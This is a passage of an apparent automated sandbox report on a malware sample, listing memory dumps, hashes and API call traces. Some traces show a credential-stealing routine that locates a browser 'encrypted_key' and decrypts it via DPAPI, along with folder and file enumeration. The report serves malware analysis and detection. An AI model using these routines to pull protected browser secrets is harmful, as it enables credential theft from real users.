                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 2932963edf25924533e3f2a92edf5ecec170e9dec29538390f24b6d01bd2dea7
                                        • Instruction ID: 809b05af089b9039faa8f6cc462d4b6436865fb35c67580ac62e6cce049ebdce
                                        • Opcode Fuzzy Hash: 2932963edf25924533e3f2a92edf5ecec170e9dec29538390f24b6d01bd2dea7
                                        • Instruction Fuzzy Hash: 1681D472A101189BDB04FBA4DE56EEE7338BF64301F504629F907A6091FF346A4DCB66
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen
                                        • String ID:
                                        • API String ID: 367037083-0
                                        • Opcode ID: 97d33dab8779176e0f378c3df9e3c9034501eafa8943c7f69cd9d6b89bff2f05
                                        • Instruction ID: 8cace3af4a1a587fbb724a20ebc2831057fcabf80d21d641f29534bc7d1d282f
                                        • Opcode Fuzzy Hash: 97d33dab8779176e0f378c3df9e3c9034501eafa8943c7f69cd9d6b89bff2f05
                                        • Instruction Fuzzy Hash: 2C414D72E10108AFCF04EFA4D945AEFB774BF54305F008518E912A6291EB74AA49CFA2
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A499EC
                                          • Part of subcall function 00A499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A49A11
                                          • Part of subcall function 00A499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A49A31
                                          • Part of subcall function 00A499C0: ReadFile.KERNEL32(000000FF,?,00000000,00A4148F,00000000), ref: 00A49A5A
                                          • Part of subcall function 00A499C0: LocalFree.KERNEL32(00A4148F), ref: 00A49A90
                                          • Part of subcall function 00A499C0: CloseHandle.KERNEL32(000000FF), ref: 00A49A9A
                                          • Part of subcall function 00A58E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A58E52
                                        • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A49D39
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49AEF
                                          • Part of subcall function 00A49AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A44EEE,00000000,?), ref: 00A49B01
                                          • Part of subcall function 00A49AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A44EEE,00000000,00000000), ref: 00A49B2A
                                          • Part of subcall function 00A49AC0: LocalFree.KERNEL32(?,?,?,?,00A44EEE,00000000,?), ref: 00A49B3F
                                          • Part of subcall function 00A49B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A49B84
                                          • Part of subcall function 00A49B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00A49BA3
                                          • Part of subcall function 00A49B60: LocalFree.KERNEL32(?), ref: 00A49BD3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                        • String ID: $"encrypted_key":"$DPAPI
                                        • API String ID: 2100535398-738592651
                                        • Opcode ID: 0988fc431ecdb902e3425951a666ea2033c34fa9af9b7280c891aa339e398686
                                        • Instruction ID: 9214632bb833c2c6ffafed0464c2901d8570c2d6084f938f6728788b8dead108
                                        • Opcode Fuzzy Hash: 0988fc431ecdb902e3425951a666ea2033c34fa9af9b7280c891aa339e398686
                                        • Instruction Fuzzy Hash: DD3145B9D10109ABCF14DFE4DD85EEFB7B8BF88304F144519E905A7241EB349A15CBA1
                                        APIs
                                        • CreateFileA.KERNEL32(00A53AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00A53AEE,?), ref: 00A592FC
                                        • GetFileSizeEx.KERNEL32(000000FF,00A53AEE), ref: 00A59319
                                        • CloseHandle.KERNEL32(000000FF), ref: 00A59327
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleSize
                                        • String ID:
                                        • API String ID: 1378416451-0
                                        • Opcode ID: e6336d392901440cdd0f2be8ec88e755a9e3f9c4f5fdf98236a487f75c59579c
                                        • Instruction ID: 5487eff025364a9a3f4694b8edb79c04ff3d5bb0d818cd52b6715c2e7206c625
                                        • Opcode Fuzzy Hash: e6336d392901440cdd0f2be8ec88e755a9e3f9c4f5fdf98236a487f75c59579c
                                        • Instruction Fuzzy Hash: 0EF04F35E40208FBEB10DFB4DC49F9E77B9FB48721F10C258BA51AB2C0DA7496059B44
                                        APIs
                                        • __getptd.LIBCMT ref: 00A5C74E
                                          • Part of subcall function 00A5BF9F: __amsg_exit.LIBCMT ref: 00A5BFAF
                                        • __getptd.LIBCMT ref: 00A5C765
                                        • __amsg_exit.LIBCMT ref: 00A5C773
                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 00A5C797
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                        • String ID:
                                        • API String ID: 300741435-0
                                        • Opcode ID: d589267e729ba8edf6be06eaa99fc8e486694439abc19c93d1b06e696c5f71ad
                                        • Instruction ID: 5b4dd0efd8122e88bb0fd4a2d8a58508f9140e813f9433c303496e1244cea62e
                                        • Opcode Fuzzy Hash: d589267e729ba8edf6be06eaa99fc8e486694439abc19c93d1b06e696c5f71ad
                                        • Instruction Fuzzy Hash: 06F09A72A10710AFD720BBB89A06B4A33B07F04737F244249FC15A65D6CB745A8D9EA6
                                        APIs
                                          • Part of subcall function 00A58DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A58E0B
                                        • lstrcat.KERNEL32(?,00000000), ref: 00A54F7A
                                        • lstrcat.KERNEL32(?,00A61070), ref: 00A54F97
                                        • lstrcat.KERNEL32(?,01609278), ref: 00A54FAB
                                        • lstrcat.KERNEL32(?,00A61074), ref: 00A54FBD
                                          • Part of subcall function 00A54910: wsprintfA.USER32 ref: 00A5492C
                                          • Part of subcall function 00A54910: FindFirstFileA.KERNEL32(?,?), ref: 00A54943
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FDC), ref: 00A54971
                                          • Part of subcall function 00A54910: StrCmpCA.SHLWAPI(?,00A60FE0), ref: 00A54987
                                          • Part of subcall function 00A54910: FindNextFileA.KERNEL32(000000FF,?), ref: 00A54B7D
                                          • Part of subcall function 00A54910: FindClose.KERNEL32(000000FF), ref: 00A54B92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                        • String ID:
                                        • API String ID: 2667927680-0
                                        • Opcode ID: bf839d936ea9fc35a13599dcf942a1a8a4df038367c1a87b0168cac702b6d52f
                                        • Instruction ID: ae8a4290881c30614c5a8eff6da4b14377b6a14da6fba0431924c74bbd0036ed
                                        • Opcode Fuzzy Hash: bf839d936ea9fc35a13599dcf942a1a8a4df038367c1a87b0168cac702b6d52f
                                        • Instruction Fuzzy Hash: E521AA76900208A7D754FBB0DD46FEE337CBB98301F004555B65993181EE749ACD8BA7